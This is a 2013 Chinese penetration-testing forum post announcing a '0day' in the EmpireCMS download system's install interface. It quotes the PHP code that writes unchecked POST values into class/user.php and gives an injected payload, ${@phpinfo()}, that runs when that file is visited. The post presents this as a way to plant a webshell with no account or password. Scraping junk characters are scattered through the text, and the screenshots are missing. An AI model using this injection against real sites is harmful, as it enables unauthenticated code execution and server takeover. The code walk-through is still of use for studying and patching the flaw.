中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin    时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们' D$ S- T4 A7 Q0 i- U

' R' Y6 S) F- c4 ~" E) c


$ }$ _8 @/ Y& Y! M这是帝国的一套下载系统 如图
" T( G7 M/ z9 Z7 Ips(不需要任何账户和密码,直接写shell)


% q8 {& A# C" K

由于很多站是由于下载要整合discuz 等等一些论坛....
' @# _% \% y( h3 T


& K' r; e0 Q* ^$ C0 Q$ U' A

而帝国他又有一个万能接口,如图


  {4 {/ c- h- b& a. ^3 \[attach]170[/attach]" e, [6 V, k  L- q3 [
) y4 t0 ^& Y, l: s2 p2 J0 k3 g

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码! G: h0 B! g) H' G% M$ \0 @# {4 ^& a8 D
) {6 K: \8 v! g# ]4 h
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪0 W( m- e3 h& I3 x

, T2 ~% |6 M% A3 x; p在data/fun.php中的15行; n5 Y/ r8 W2 P

; }9 \, T6 r$ r2 _/ q7 r我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {0 L, h; H3 K  U1 G8 ~5 E6 G' Q& x0 x
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
; N9 y) P% |/ P' y
; Z, b7 k7 b  Y" u7 H/ F这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);. M# Y4 w1 h' @! @; p! l" P, \! a* t

& b3 q' g0 ]7 N3 R他将传进来的变量进行了切割,然后赋给了$filetext
6 h3 Q( z  k5 V8 H1 d" U. d+ o" L6 s$ ]  V, n6 u
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了; i) L; n6 L+ Y8 }

/ s. z& F! w% U9 L+ a( l% ]我们看看写入的结果,随便填一个


2 w' m# Y! H- e[attach]171[/attach]
% t  |( |! O% m# R
, r& Q  ]. A  h: `
: Y. }: g6 k% @' o[attach]172[/attach]. r. `4 k5 g, t: O$ c  q
: i. E/ n) V6 i- k

% g  F& _: }% p3 N* [+ ?
7 m" B5 c$ H; l4 o1 m

- l. ~4 Q/ ^( r( |2 B7 N( k
. M- }- X2 {$ p. m; M

! B: ~6 {5 F& m6 C; W: L4 U
, J5 Q1 r  Z% v0 f
4 a6 q. M% u) r5 Y% ~0 I3 `4 ^. E- [8 {! p/ u$ L4 a
[attach]173[/attach]

6 {: h% t' c1 i: ?
% C, O* P$ D/ J. K. x: S& P2 ~; a# e" b. d. R: B3 Y, X; T9 \( N0 g
9 ?+ k9 i9 o8 T' M: Y
8 w* i5 c/ D' ]! H
5 c% f/ Y0 e* |; j' q
[attach]174[/attach]
& K( x' x' C- r& K+ Q7 ~  m9 D; j( @7 k: k) F, f8 Q4 N# |+ e

所以我们淫荡点,写个${@phpinfo()}试试


5 F+ V) B" b4 u; R. p; V

然后访问以下class/user.php这个文件) Y" B4 J5 Y8 w& }
日了吧


+ q8 X8 d. y8 L# b# Q3 A: F' N
* D. \8 P1 z4 U& M7 t- M

" }" w, x8 \3 Y. l! \% G, k& V- X' l% i5 U* u3 A& {7 v
2 a$ n  W  R- i0 t

" E) B  W8 r: R( T: A( i7 H! p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2